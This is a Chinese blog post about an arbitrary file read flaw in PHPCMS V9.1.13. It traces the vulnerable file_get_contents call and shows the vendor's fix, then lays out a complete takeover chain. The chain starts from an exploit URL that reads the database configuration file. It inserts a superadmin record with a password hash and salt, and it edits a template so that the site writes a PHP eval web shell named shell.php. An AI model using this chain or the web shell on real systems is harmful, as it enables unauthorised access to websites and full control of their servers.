PHPCMS V9.1.13任意文件包含漏洞分析

最新推荐文章于 2022-08-15 21:17:11 发布
最新推荐文章于 2022-08-15 21:17:11 发布
阅读量3.4k 收藏 1
点赞数
分类专栏: 漏洞收集 文章标签: url file vim linux c
本文详细解析了PHPCMS V9.1.13版本中存在的任意文件包含漏洞,通过使用Linux工具快速定位漏洞函数,并展示了如何在新版本中修复该漏洞。此外,文章还介绍了如何获取shell并实现远程控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近爆出了PHPCMS V9.1.13任意文件包含漏洞,新版本(v9.1.16)已经针对该漏洞做了修复。


下载PHPCMS V9.1.13,解压。


这里我就用Linux天生具备的高效分析能力去快速定位存在漏洞的函数。就懒得找入口点看代码了。


首先我们看触发漏洞的url:/index.php?m=search&c=index&a=public_get_suggest_keyword&url=test&q=../../phpsso_server/caches/configs/database.php


我将public_get_suggest_keyword作为关键字在源码中查找:


1,cd phpcms_v9_GBK/install_package/

2,grep -H -n -R "public_get_suggest_keyword" *

参数说明:-H可以显示文件名;-n显示行号;-R递归目录,查找所有文件


结果如图:



在phpcms/modules/search/index.php文件的第198行找到该函数的定义了:public function public_get_suggest_keyword()


vim phpcms/modules/search/index.php


然后在vim里按shift+冒号,进入vim命令行模式,输入set number可以显示行号,再输入198,直接跳转到198行处:


198         public function public_get_suggest_keyword() {

199                 $url = $_GET['url'].'&q='.$_GET['q'];

200 

201                 $res = @file_get_contents($url);

202                 if(CHARSET != 'gbk') {

203                         $res = iconv('gbk', CHARSET, $res);

204                 }

205                 echo $res;

206         }


注意第201行的file_get_contents函数,该函数可以获得指定文件的内容,在此并未做过滤直接可以读取任意文件内容。


在新版本中该函数已经修复:


198         public function public_get_suggest_keyword() {

199                 $url = $_GET['url'].'&q='.$_GET['q'];

200                 $trust_url = array('c8430fcf851e85818b546addf5bc4dd3');

201                 $urm_md5 = md5($url);

202                 if (!in_array($urm_md5, $trust_url)) exit;

203 

204                 $res = @file_get_contents($url);

205                 if(CHARSET != 'gbk') {

206                         $res = iconv('gbk', CHARSET, $res);

207                 }

208                 echo $res;

209         }


关于拿shell


开启外联的增加一条数据库

Username:admin password: 3a9a8068f44c3afc55c424ab8a1c27cf roleid:1 encrypt:Ft7aax

注意这几项必须添负责登录不了的。应为这条记录的意思是添加用户名为admin,密码为:kaonima的超级管理员



登录后台后我们找到界面-》模版风格-》选择默认模版点击详情列表



然后点击里面的search目录下面的index.html右侧的编辑



修改其模版为:

<?php $shell = '<?php @eval($_POST[cmd]);?>';file_put_contents('shell.php',$shell);?>


提交保存

然后访问:localhost/index.php?m=search

会在根目录生成一个shell.php的一句话 

Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6043
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
PHPCMS V9.1.13 正式版盛大发布[最后更新:20120129]
04-05
PHPCMS V9(简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。 这是UTF8的压缩包
phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞
weixin_34341229的博客
04-07 226
by c4rp3nt3r@0x50sec.org phpcms2008 sp2 or sp4偶没仔细看 这年头发个bug伤不起啊,厂商忽略,被人当成装X,有木有,心情不爽啊不管这么多了。 phpcms本地包含拿shell的方法,这篇文章接上一个 http://www.wooyun.org/bugs/wooyun-2010-01795 《phpcmsphpcms_...
phpcms_v9.1.13_GBK.zip
06-04
phpcms_v9.1.13_GBK.zip
PHPCMS最新版任意文件上传漏洞分析
zimuxin的专栏
09-22 4324
工具:火狐插件hackbar 前几天就听朋友说PHPCMS最新版出了几个洞,有注入还有任意文件上传,注入我倒不是很惊讶,因为phpcms只要拿到了authkey注入就一大堆…… 任意文件上传倒是很惊讶,但是小伙伴并没有给我exp,今天看到了EXP,但是没有详细分析,那我就自己分析一下好啦。 首先去官网下一下最新版的程序,搭建起来。 为了方便各位小伙伴复现,这里附上最新版的下
php 本地文件包含漏洞,PHPCMS V9 (plugin.php)本地文件包含漏洞
weixin_39815600的博客
03-24 560
由于文件/plugin.php对于用户提交的变量未过滤,导致本地文件包含漏洞的产生。相关代码如下:文件plugin.phpif(isset($_GET['id'])) {list($identification, $filename,$action) = explode('-', $_GET['id']);$filename = !empty($filename) ? $filename : $i...
[CVE-2014-8959] phpmyadmin任意文件包含漏洞分析
weixin_34278190的博客
07-07 215
首发360播报:http://bobao.360.cn/learning/detail/113.html最近写的文章比较喜欢投递到各大平台,一是能赚点学费养家糊口,二是提高一下原创性。我发现如果文章发到一些社区或直接发博客,知名度不高很容易被转载以后不署名,导致转来转去后来就不知道谁是作者了。写了这么久文章也没给博客带来什么知名度,大概也就是因此吧。不如先发到...
phpmyadmin任意文件包含漏洞分析(含演示)
weixin_33883178的博客
02-16 412
0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发。 最新的CVE-2014-8959公告中,提到该程序多个版本存在任意文件包含漏洞,影响版本如下: phpMyAdmin 4.0.1 – 4.0.10.6 4.1.1 – 4.1.14.7 4.2.1 – 4.2.12 0x02 补丁分析 看到bobao.360.cn上提到了这个漏洞...
PHPcmsV9任意文件读取漏洞拿Shell
cc1988429的专栏
10-30 1430
http://www.webshell.cc/3918.html
phpcmsv9最新利用工具
04-01
phpcmsv9最新利用工具
phpcms_9.5.1_index.php_远程代码执行漏洞(利用工具)
03-11
phpcms_9.5.1_index.php_远程代码执行漏洞(利用工具)
CTF/CTF练习平台-phpcmsV9phpcms 9.6 漏洞利用】
Sp4rkW的博客
08-29 9014
原题内容: 一个靶机而已,别搞破坏。 多谢各位大侠手下留情,flag在根目录里txt文件里 http://120.24.86.145:8001/ 首先打开题目链接,可以观察到版本信息 首先想到的是,这很明显是个模板网站,百度走起,get几条有用信息 获得该模板基本目录信息 其次百度很明显可以看到phpcms漏洞信息,版本9.6的,这是很明显的信息了,先试试,不行再走普通流...
阿里云ECS phpcms v9 各种注入漏洞
【持续做一件事,必定有所成就!抛弃世俗之浮躁,留我钻研之刻苦!】
08-07 610
地址:
代码审计-phpcms9任意文件读取
weixin_30376323的博客
05-12 229
漏洞文件: /phpcms/modules/content/down.phpdownload函数 这个函数开始几行代码的作用和init函数中的几乎一样,都是从parse_str 解析传入的a_k参数,但这里调用了safe_replace函数过滤。 和文件名有关的参数是$s,$f。 这两个参数都是通过parse_str解析变量得到,然后程序对$f参数过滤,过滤规则如下: if(pr...
phpcms V9最新漏洞利用工具
fengling132的专栏
07-25 4630
工具作者:B0y 疯子博客《http://Madman.in》 工具下载:工具下载地址 利用方法: 先打开 1.bat 然后 把输入命令  php9   madman.in   回车键   谷歌关键字:Powered by PHPCMS v9 © 2012
phpcmsV9官方源码漏洞
haocaicai的博客
09-27 1383
1)、phpcms的/phpcms/libs/classes/attachment.class.php中,对输入参数$ext未进行类型限制,导致逻辑漏洞的产生。 解决方法:修改/phpcms/libs/classes/attachment.class.php文件143行左右的download方法,在方法开始位置加入: function download($field, $value,$...
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4888
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值